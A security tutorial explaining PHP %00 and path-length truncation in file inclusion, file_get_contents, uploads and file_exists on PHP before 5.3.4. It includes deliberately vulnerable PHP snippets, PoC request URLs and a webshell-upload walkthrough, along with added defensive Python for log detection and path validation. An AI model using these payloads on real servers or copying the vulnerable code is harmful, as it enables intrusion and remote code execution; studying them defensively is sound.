Exploitation of Truncation in file inclusion and upload

Truncation may be applicable in the following situations:

include (require)
file_get_contents
file_exists

In each case the URL parameter that reaches the function must be attacker-controlled, and the truncation character is %00.

0x01. Local file inclusion

1.1 Truncation type: PHP %00 truncation

Truncation conditions:

PHP version earlier than 5.3.4 (CVE-2006-7243)
magic_quotes_gpc = Off

Vulnerable file lfi.php:

<?php
$temp = $_REQUEST['action'] . ".php"; // user input concatenated with a fixed extension
include $temp;                         // including a user-controlled path causes LFI; a %00 in the input truncates off ".php"
?>

File to include: password

<?php phpinfo(); ?>

Request: lfi.php?action=password%00

Note: the %00 in the URL is URL-decoded to the byte 0x00, which is what causes the truncation.

The password file is successfully included and the phpinfo() function is executed.

Without the truncation conditions, lfi.php can only include files with the .php extension.

Conversely, if the truncation conditions are met, lfi.php can include a file with any extension.

With magic_quotes_gpc on and the PHP version still 5.2.9, test again: %00 is escaped to \0, two separate characters, and no truncation occurs.

The reason is that when magic_quotes_gpc is on, all ' (single quotes), " (double quotes), \ (backslashes) and NULL characters (%00) are automatically escaped with a backslash. Many other functions behave similarly, such as addslashes(), mysql_escape_string(), mysql_real_escape_string() and so on.

With magic_quotes_gpc off but the PHP version at 5.3.10, truncation also fails. So both conditions, the PHP version and gpc, must be met before truncation works.

In addition to include, require, include_once and require_once above, file_get_contents can also be attacked with PHP %00 truncation.

FileGetContents.php:

<?php
$file = $_GET['file'] . 'PNG';            // user input with a fixed suffix appended
$contents = file_get_contents($file);     // %00 in the input truncates the path before the suffix
file_put_contents('put.txt', $contents);
?>

Exploitation:

http://www.victim.com/FileGetContents.php?file=password%00

put.txt in the current directory now contains the content of the password file above:

<?php phpinfo(); ?>

1.2 File path truncation

In addition to the %00 described in 1.1, truncation can also be achieved by padding the path with the characters ., /. or ./ (pay attention to the order). Why other characters cannot be used must be related to the PHP implementation.

System file path length limits:

Windows: 259 bytes
Linux: 4096 bytes

For details see this article: http://joychou.org/index.php/Misc/filename-length-limit-on-windows-linux.html

Truncation conditions:

PHP version earlier than 5.3.4 (exactly which version is not clear; kukki wrote earlier than 5.2.8 on wooyun, which is obviously not right because I used 5.2.9 for testing)
It does not matter whether GPC is enabled

Vulnerable code lfi.php, the same as lfi.php in 1.1:

<?php
$temp = $_REQUEST['action'] . ".php";
include $temp;
echo $temp; // print the path that was actually built
?>

On Windows, the POC with the fewest characters:

lfi.php?action=password..............................................................................................................................................................................................................................................` 

Inclusion succeeds and the phpinfo() in password is executed.

The full path comes to 258 bytes, so the minimum number of dots is:
258 - (length of the directory path of lfi.php, C:/wamp/www/, + strlen('password'))

Alternatively, use ./ for the truncation. The shortest POC is below, and the shortest path length is again 258:

lfi.php?action=password./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 

After renaming the password file to password123, the shortest POC is below, and the shortest path length is still 258:

lfi.php?password123/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 

Note that one of the two payloads starts with /. and the other with ./, which depends on the parity of the path length. What happens is that the over-long tail of ./ or /. is discarded, and it is enough that the cut lands on the first ./ or . boundary.

Test it yourself on Linux.
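As an added example that is not part of the original article, the following Python scanner looks for the two truncation primitives described in 1.1 and 1.2 in web-server access logs: a percent-decoded NUL byte in any query parameter, and a long trailing run of ., ./ or /. filler. The log lines and the FILLER_MIN threshold are constructed for this demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Minimum trailing filler run treated as a path-length truncation attempt.
# Tuning assumption for this example: real payloads need roughly 200+ characters
# (258 bytes minus the web root and file name on Windows), so 32 is conservative.
FILLER_MIN = 32

# Constructed access-log lines in common log format; not real traffic.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /lfi.php?action=index HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2020:10:00:01 +0000] "GET /lfi.php?action=password%00 HTTP/1.1" 200 9120',
    '10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /lfi.php?action=password' + "." * 240 + ' HTTP/1.1" 200 9120',
    '10.0.0.8 - - [01/Jan/2020:10:00:03 +0000] "GET /upload.php?jieduan=xxoo.php%00 HTTP/1.1" 200 77',
    '10.0.0.9 - - [01/Jan/2020:10:00:04 +0000] "GET /lfi.php?action=./config HTTP/1.1" 200 300',
])

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Trailing run made only of ".", "./" or "/." (either order, as in section 1.2).
FILLER_RE = re.compile(r'(?:\./|/\.|\.)+$')

def classify_value(value):
    """Return a reason string if a decoded parameter value looks like a
    truncation attempt, or None if it is unremarkable."""
    if "\x00" in value:  # %00 already decoded to a NUL byte, as PHP < 5.3.4 saw it
        return "null byte"
    m = FILLER_RE.search(value)
    if m and len(m.group(0)) >= FILLER_MIN:
        return "path filler (%d chars)" % len(m.group(0))
    return None

def scan_log(text):
    """Return a list of (client_ip, parameter, reason) for each suspicious query parameter."""
    hits = []
    for line in text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        query = urlsplit(req.group(1)).query
        # parse_qsl percent-decodes, so %00 arrives here as "\x00".
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append((line.split()[0], name, reason))
    return hits

if __name__ == "__main__":
    for ip, name, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}: parameter '{name}' -> {reason}")
```

A benign relative name such as ./config is not flagged, because only a run of filler that reaches the end of the value counts.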

0x02. File Upload

Truncation type: PHP %00 truncation, so the truncation conditions are the same as for PHP %00 truncation:

PHP version earlier than 5.3.4
gpc disabled

Test environment:

PHP version 5.2.9
gpc disabled

Vulnerable code upload.php:

<html> <body>

The vulnerable code is contrived and may not occur in real situations; it only demonstrates that truncation can be used to achieve the upload.

First, rename a PHP Trojan (webshell) to a whitelisted extension, such as .jpg.

Visit: http://www.victim.com/upload.php?jieduan=xxoo.php%00

Click the submit button, and an xxoo.php Trojan is created on the server.

0x03. file_exists: determining whether a file exists

file_exists is also affected by truncation when checking whether a file exists.

Truncation conditions:

PHP version earlier than 5.3.4
GPC off

The vulnerable code is as follows; it is also the pattern behind CVE-2014-8959 in phpMyAdmin.

<?php
$file = $_GET['file'];
$filename = $file . '.php';           // fixed extension appended to user input
echo $filename . '<br>';
if (!file_exists($filename)) {        // a %00 in $file ends the path before ".php"
    echo 'not exist';
} else {
    include_once($filename);
    echo 'exist';
}
?>

When there is a shell.jpg in the current directory, request it with ?file=shell.jpg%00; the returned result is that the file exists.

TIPS:

When the assignment above becomes $filename = 'xxoo' . $file . '.php'; and you still want to use shell.jpg, construct the request as ?file=/../shell.jpg%00, using /../ to return to the current directory.

Directory switching in PHP paths:

../ denotes the parent directory
./ denotes the current directory
/ by itself cannot stand for the current directory; xx/ denotes the directory xx
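As an added example that is not part of the original article, here are the checks a defender would put in front of the $file . '.php' concatenation used in the file_exists and include snippets above, written in Python as a language-neutral sketch. The name is allowlisted before it is concatenated, and the NUL-byte and /../ cases from this section are refused explicitly; WEB_ROOT and the test values are assumptions.

```python
import posixpath
import re

# Assumed document root for the demonstration (the article used C:/wamp/www/).
# posixpath is used instead of os.path so the example behaves the same on every platform.
WEB_ROOT = "/var/www/html"
# Allowlist for the bare name: letters, digits, "_" and "-" only; no dots, slashes or NUL.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

def resolve_include(user_value, base_dir=WEB_ROOT, ext=".php"):
    """Return the absolute path to include, or None if the request must be refused.

    Mirrors the vulnerable pattern $filename = $file . '.php', but validates the
    user value before it is concatenated with the extension."""
    # 1. %00 decodes to a NUL byte; the C-level file functions in PHP < 5.3.4 stopped
    #    reading the path there, which is the primitive behind 0x01, 0x02 and 0x03.
    if "\x00" in user_value:
        return None
    # 2. Allowlist the bare name. This alone rejects "./" and "/." filler, "/../" and
    #    any foreign extension such as shell.jpg.
    if not NAME_RE.fullmatch(user_value):
        return None
    candidate = posixpath.normpath(posixpath.join(base_dir, user_value + ext))
    # 3. Defence in depth: the normalised path must stay under base_dir and keep the
    #    extension the application intended to enforce.
    if posixpath.commonpath([base_dir, candidate]) != base_dir:
        return None
    if not candidate.endswith(ext):
        return None
    return candidate
```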
